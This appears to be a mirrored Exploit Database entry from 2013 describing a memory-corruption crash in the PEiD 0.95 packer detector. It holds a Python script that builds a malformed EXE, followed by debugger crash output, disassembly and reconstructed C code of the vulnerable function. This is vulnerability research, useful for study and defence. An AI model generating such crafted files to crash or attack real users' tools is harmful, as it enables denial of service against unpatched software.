PEiD 0.95 – Memory Corruption (PoC)

• Exploit Database
• 101 阅读

• 作者： Debasish Mandal
  日期： 2013-06-24
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/26413/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270

  # Title: PEiD v0.95 Memory Corruption # About PEiD :PEiD is an intuitive application that relies on its user-friendly interface to detect packers, cryptors and compilers found in PE executable files. Very popular among malware researchers for detection of packers / cryptors. # Date: 22nd June 2013 # Author: Debasish Mandal ( https://twitter.com/debasishm89 ) # Blog : http://www.debasish.in/ # Version: PEiD version 0.95 # Download Link : http://www.softpedia.com/progChangelog/PEiD-updated-Changelog-4102.html # Tested on: Windows XP SP2 / Windows 7 # Vendor Patch : Unpatched. This software is not under active development. Last stable version released on November 6th, 2008. # Threat mitigation : Exploitation of this issue requires the user to explicitly open a specially crafted EXE file. So the PEiD user should refrain from opening files from untrusted third parties or accessing untrusted remote sites.   # POC   # c:\python27 junk = "\x41" header = "MZ" header += junk * 58 header += "\x80" header += "\x00" * 3 header += junk * 64 header += "PE" header += "\x00"*2 header += junk * 3 header += "\x00" header += junk * 12 header += "\xe0\x00" header += junk * 2 header += "\x0b\x01" header += junk * 16 header += "\x00" * 2 header += junk * 338 header += "\x00" * 2 header += junk * 5 header += "\x00" * 3 header += junk * 2427 header += "\xa9" header += junk * 7 header += "\x90" header += junk * 3 header += "\x90" header += junk * 40 f = open(&apos;peid_poc.exe&apos;,&apos;wb&apos;) f.write(header) f.close() &apos;&apos;&apos; Above python code will generate a crafted EXE. This EXE can be used as POC to trigger the Crash of PEiD version 0.95.   (9fc.c2c): Access violation - code c0000005 (!!! second chance !!!) eax=00000000 ebx=6fbeca5e ecx=00d4fae0 edx=00000019 esi=00000000 edi=91164141 eip=0043d4d1 esp=00d4faac ebp=00d4fee8 iopl=0 nv up ei ng nz na pe nc cs=001bss=0023ds=0023es=0023fs=0038gs=0000 efl=00000286 *** WARNING: Unable to verify checksum for C:\Documents and Settings\debasish mandal\Desktop\Tools\PEiD-0.95-20081103\PEiD.exe *** ERROR: Module load completed but symbols could not be loaded for C:\Documents and Settings\debasish mandal\Desktop\Tools\PEiD-0.95-20081103\PEiD.exe PEiD+0x3d4d1: 0043d4d1 8a0c07mov cl,byte ptr [edi+eax]ds:0023:91164141=??   PEiD Crashes at With Read AV @ 0043d4d1. EDI Register is pointing to ring0 : edi=91164141.   Stack Trace:   0:001> kb ChildEBP RetAddrArgs to Child WARNING: Stack unwind information not available. Following frames may be wrong. 00d4fee8 78b8c3c0 64123456 0000058f c4830000 PEiD+0x3d4d1 00d4ff04 0045d1e6 0040867c 00d4ff7c 00000000 0x78b8c3c0 00d4ff40 00455b97 0040867c 00d4ff7c 00000000 PEiD+0x5d1e6 00d4ffb4 7c80b50b 0048650c 001520a8 0012f4bc PEiD+0x55b97 00d4ffe0 7c80b517 00000000 00000000 00000000 kernel32!BaseThreadStart+0x37 00d4ffe4 00000000 00000000 00000000 00455a50 kernel32!BaseThreadStart+0x43   Stack Dump:   0:001> d esp 00d4faac41 41 41 90 7c ff d4 00-40 ff d4 00 77 ca be 6fAAA.|...@...w..o 00d4fabce0 fa d4 00 37 4c 44 00-41 41 16 91 77 ca be 6f....7LD.AA..w..o 00d4faccdc fa d4 00 20 01 00 00-18 00 00 00 7c 86 40 00.... .......|.@. 00d4fadc90 41 91 7c e8 fe d4 00-19 00 00 00 08 00 00 00.A.|............ 00d4faec1a 00 00 00 1a 00 00 00-1a 00 00 00 05 00 00 00................ 00d4fafc0c 00 00 00 1a 00 00 00-1a 00 00 00 1a 00 00 00................ 00d4fb0c1a 00 00 00 1a 00 00 00-1a 00 00 00 1a 00 00 00................ 00d4fb1c1a 00 00 00 1a 00 00 00-1a 00 00 00 1a 00 00 00................   00DFFAAC 90414141 <- ESP 00DFFAB0 00DFFF7C 00DFFAB4 00DFFF40 00DFFAB8 6FBECA77 00DFFABC 00DFFAE0 00DFFAC0 00444C37RETURN to PEiD.00444C37 from PEiD.0043D4A0 00DFFAC4 91084141 00DFFAC8 6FBECA77 00DFFACC 00DFFADC 00DFFAD0 00000120 00DFFAD4 00000018 00DFFAD8 0040867CPEiD.0040867C 00DFFADC 7C914190RETURN to ntdll.7C914190 from ntdll.7C910387   Disassembly of the function where program crashed. Function : PEiD.0043D4A0 (I&apos;ve named it as "crash_function")   0043D4A0 51 PUSH ECX 0043D4A1 8B51 04MOV EDX,DWORD PTR DS:[ECX+4] 0043D4A4 8B4424 0CMOV EAX,DWORD PTR SS:[ESP+C] 0043D4A8 3BC2 CMP EAX,EDX 0043D4AA 890C24 MOV DWORD PTR SS:[ESP],ECX 0043D4AD 7D 06JGE SHORT PEiD.0043D4B5 0043D4AF 32C0 XOR AL,AL 0043D4B1 59 POP ECX 0043D4B2 C2 0C00RETN 0C 0043D4B5 53 PUSH EBX 0043D4B6 55 PUSH EBP 0043D4B7 8BD8 MOV EBX,EAX 0043D4B9 56 PUSH ESI 0043D4BA 2BDA SUB EBX,EDX 0043D4BC 33F6 XOR ESI,ESI 0043D4BE 57 PUSH EDI 0043D4BF 8B7C24 18MOV EDI,DWORD PTR SS:[ESP+18] 0043D4C3 85DB TEST EBX,EBX 0043D4C5 7E 34JLE SHORT PEiD.0043D4FB 0043D4C7 33C0 XOR EAX,EAX 0043D4C9 85D2 TEST EDX,EDX 0043D4CB 7E 42JLE SHORT PEiD.0043D50F 0043D4CD 8B29 MOV EBP,DWORD PTR DS:[ECX] 0043D4CF 03FE ADD EDI,ESI 0043D4D1 8A0C07 MOV CL,BYTE PTR DS:[EDI+EAX] <- Code crashes here 0043D4D4 3A0C28 CMP CL,BYTE PTR DS:[EAX+EBP] 0043D4D7 75 07JNZ SHORT PEiD.0043D4E0 0043D4D9 40 INC EAX 0043D4DA 3BC2 CMP EAX,EDX   Setting a BP @ Entry 0x0043D4A0 of this function we can see the value of EDI register is already corrupted before entering into this function. To find out the cross reference which means other function calling above function we used IDA Pro. IDA Pro Shows us that this function is getting called multiple times:   Direction Type AddressText --------- ---- ----------- Downpsub_43DF00+E1callcrash_function Downpsub_43F260+1E9 callcrash_function Downpsub_43F260+230 callcrash_function Downpsub_43F260+312 callcrash_function Downpsub_43F260+346 callcrash_function Downpsub_43F260+382 callcrash_function Downpsub_43F260+3A9 callcrash_function Downpvuln_func+162callcrash_function Downpsub_446020+1A5 callcrash_function Downpsub_446020+1C7 callcrash_function Downpsub_446020+20F callcrash_function Downpsub_446020+22D callcrash_function Downpsub_446020+271 callcrash_function Downpsub_446020+28F callcrash_function Downpsub_446020+2D6 callcrash_function Downpsub_446020+2F8 callcrash_function Downpsub_446020+339 callcrash_function Downpsub_446020+357 callcrash_function   After Analyzing the code It was found found that below function is actually calling the PEiD.0043D4A0 function which triggers the crash: This is the actual vulnerable function which causes the corruption.   00444AD0 81EC 2C040000SUB ESP,42C 00444AD6 A1 D4A54000MOV EAX,DWORD PTR DS:[40A5D4] 00444ADB 33C4 XOR EAX,ESP 00444ADD 898424 28040000MOV DWORD PTR SS:[ESP+428],EAX 00444AE4 33C9 XOR ECX,ECX 00444AE6 56 PUSH ESI 00444AE7 8BB424 38040000MOV ESI,DWORD PTR SS:[ESP+438] 00444AEE 8B46 0CMOV EAX,DWORD PTR DS:[ESI+C] 00444AF1 C68424 10040000 >MOV BYTE PTR SS:[ESP+410],89 00444AF9 C68424 11040000 >MOV BYTE PTR SS:[ESP+411],4A 00444B01 C68424 12040000 >MOV BYTE PTR SS:[ESP+412],0FC 00444B09 C68424 13040000 >MOV BYTE PTR SS:[ESP+413],33 00444B11 C68424 14040000 >MOV BYTE PTR SS:[ESP+414],0C0 00444B19 C68424 15040000 >MOV BYTE PTR SS:[ESP+415],0C3 00444B21 C68424 16040000 >MOV BYTE PTR SS:[ESP+416],0B8 00444B29 C68424 17040000 >MOV BYTE PTR SS:[ESP+417],78 00444B31 C68424 18040000 >MOV BYTE PTR SS:[ESP+418],56 00444B39 C68424 19040000 >MOV BYTE PTR SS:[ESP+419],34 00444B41 C68424 1A040000 >MOV BYTE PTR SS:[ESP+41A],12 00444B49 C68424 1B040000 >MOV BYTE PTR SS:[ESP+41B],64 00444B51 C68424 1C040000 >MOV BYTE PTR SS:[ESP+41C],8F 00444B59 C68424 1D040000 >MOV BYTE PTR SS:[ESP+41D],5 00444B61 888C24 1E040000MOV BYTE PTR SS:[ESP+41E],CL 00444B68 888C24 1F040000MOV BYTE PTR SS:[ESP+41F],CL 00444B6F 888C24 20040000MOV BYTE PTR SS:[ESP+420],CL 00444B76 888C24 21040000MOV BYTE PTR SS:[ESP+421],CL 00444B7D C68424 22040000 >MOV BYTE PTR SS:[ESP+422],83 00444B85 C68424 23040000 >MOV BYTE PTR SS:[ESP+423],0C4 00444B8D C68424 24040000 >MOV BYTE PTR SS:[ESP+424],4 00444B95 C68424 25040000 >MOV BYTE PTR SS:[ESP+425],55 00444B9D C68424 26040000 >MOV BYTE PTR SS:[ESP+426],53 00444BA5 C68424 27040000 >MOV BYTE PTR SS:[ESP+427],51 00444BAD C68424 28040000 >MOV BYTE PTR SS:[ESP+428],57 00444BB5 0FB740 06MOVZX EAX,WORD PTR DS:[EAX+6] 00444BB9 83F8 02CMP EAX,2 00444BBC 73 18JNB SHORT PEiD.00444BD6 00444BBE 32C0 XOR AL,AL 00444BC0 5E POP ESI 00444BC1 8B8C24 28040000MOV ECX,DWORD PTR SS:[ESP+428] 00444BC8 33CC XOR ECX,ESP 00444BCA E8 A88F0200CALL PEiD.0046DB77 00444BCF 81C4 2C040000ADD ESP,42C 00444BD5 C3 RETN 00444BD6 53 PUSH EBX 00444BD7 57 PUSH EDI 00444BD8 8B7E 18MOV EDI,DWORD PTR DS:[ESI+18] 00444BDB 8D1480 LEA EDX,DWORD PTR DS:[EAX+EAX*4] 00444BDE 8B7CD7 ECMOV EDI,DWORD PTR DS:[EDI+EDX*8-14] 00444BE2 51 PUSH ECX 00444BE3 48 DEC EAX 00444BE4 50 PUSH EAX 00444BE5 8BCE MOV ECX,ESI 00444BE7 E8 748A0100CALL PEiD.0045D660 00444BEC 8BD8 MOV EBX,EAX 00444BEE 8D043B LEA EAX,DWORD PTR DS:[EBX+EDI] 00444BF1 3B46 04CMP EAX,DWORD PTR DS:[ESI+4] 00444BF4 76 1AJBE SHORT PEiD.00444C10 00444BF6 5F POP EDI 00444BF7 5B POP EBX 00444BF8 32C0 XOR AL,AL 00444BFA 5E POP ESI 00444BFB 8B8C24 28040000MOV ECX,DWORD PTR SS:[ESP+428] 00444C02 33CC XOR ECX,ESP 00444C04 E8 6E8F0200CALL PEiD.0046DB77 00444C09 81C4 2C040000ADD ESP,42C 00444C0F C3 RETN 00444C10 6A 19PUSH 19 00444C12 8D8C24 1C040000LEA ECX,DWORD PTR SS:[ESP+41C] 00444C19 51 PUSH ECX 00444C1A 8D4C24 18LEA ECX,DWORD PTR SS:[ESP+18] 00444C1E E8 1D87FFFFCALL PEiD.0043D340 00444C23 8B06 MOV EAX,DWORD PTR DS:[ESI] 00444C25 8D5424 0CLEA EDX,DWORD PTR SS:[ESP+C] 00444C29 52 PUSH EDX 00444C2A 53 PUSH EBX 00444C2B 03C7 ADD EAX,EDI 00444C2D 50 PUSH EAX 00444C2E 8D4C24 1CLEA ECX,DWORD PTR SS:[ESP+1C] 00444C32 E8 6988FFFFCALL PEiD.0043D4A0<- CAll to the crash function   Equivalent C Code:   char vuln_func(int a1, int a2) { int v6; v3 = (a2 + 12); v9 = -119; v10 = 74; v11 = -4; // Declaration of few more local variables. Ommited v2 = (v3 + 6); if ( v2 >= 2 ) { v6 = ((a2 + 24) + 40 * v2 - 20); // <<--- v5 = before_crash1(a2, v2 - 1, 0); if ((v5 + v6) <= (a2 + 4) ) { before_crash2(&v9, 25); result = crash_function((int)&v8, v6 + a2, v5, (int)&v7); //Vulnerable function calling the crash_function. Inside this peid prog. will crash } else { result = 0; } } else { result = 0; } return result; }   &apos;&apos;&apos;